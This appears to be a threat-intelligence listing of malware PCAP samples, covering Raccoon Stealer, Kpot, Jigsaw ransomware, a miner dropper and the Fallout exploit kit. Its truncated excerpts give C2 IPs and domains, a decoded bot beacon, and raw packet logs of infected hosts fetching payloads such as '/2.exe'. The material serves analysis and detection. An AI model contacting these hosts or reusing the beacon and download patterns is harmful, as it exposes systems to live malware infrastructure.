Raccoon Stealer infection Malware svchost.exe 217.8.117.89 34.89.22.128

This is the latest sample of Raccoon which is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019. This malware uses base64 encoding for each infected host as you can see below in the packets and here is what it looks like decoded: echo “Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=” | base64 -d bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null 2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, […]

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What Kryptik virus can do? Executable code extraction Attempts to connect to a dead IP:Port (1 unique times) Creates RWX memory A process attempted to delay the analysis task. Expresses interest in specific running processes HTTP traffic contains suspicious features which may be indicative of malware related traffic Performs some HTTP requests The binary likely contains encrypted or compressed data. Detects Sandboxie through the presence of a library Checks for the presence of known windows from debuggers and forensic tools Attempts to repeatedly call a single API many times in order to delay analysis time Steals private information from local Internet […]

Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Avast FileRepMetagen [Malware] AVG FileRepMetagen [Malware] Avira (no cloud) Malwarebytes Ransom.Jigsaw McAfee-GW-Edition BehavesLike.Win32.Ransomware.dc Microsoft Trojan:Win32/Occamy.C When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below: 2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a..2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0E..4f^@…H…V.)a…!.Pp……… ..s…………..2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0E..(f_@…H…V.)a…!.Pp…zMk.P.@………..2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]

Malware Dropper tldrbox.top Loads Crypto Currency Miner PCAP Download Traffic Sample

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1E…]R@….J..V.]~<m._.P+…80..P.@t….GET /2.exe HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)Accept-Encoding: gzip, deflateHost: tldrbox.topConnection: Keep-Alive 2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0E..(..@.-..A]~ 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OKE…..@.-…]~<m..V..P._80..+…P… T..HTTP/1.1 200 OKServer: nginx/1.16.1Date: Mon, 13 Apr 2020 04:29:15 GMTContent-Type: application/octet-streamContent-Length: 556032Last-Modified: Wed, 08 Apr 2020 02:44:48 GMTConnection: keep-aliveETag: […]

Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVE’s as of 4-8-2020: Vulnerabilities CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop – Ransomware GandCrab 5 – Ransomware Kraken Cryptor – Ransomware GandCrab – Ransomware Maze – Ransomware Fake Globe – Ransomware Minotaur – Ransomware Matrix – Ransomware Sodinokibi – Ransomware Raccoon Stealer – This sample (also known as Legion, Mohazo, and Racealer) is high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues. 2020-02-24 19:34:02.651895 IP […]





Dashlane 5 - New and Improved!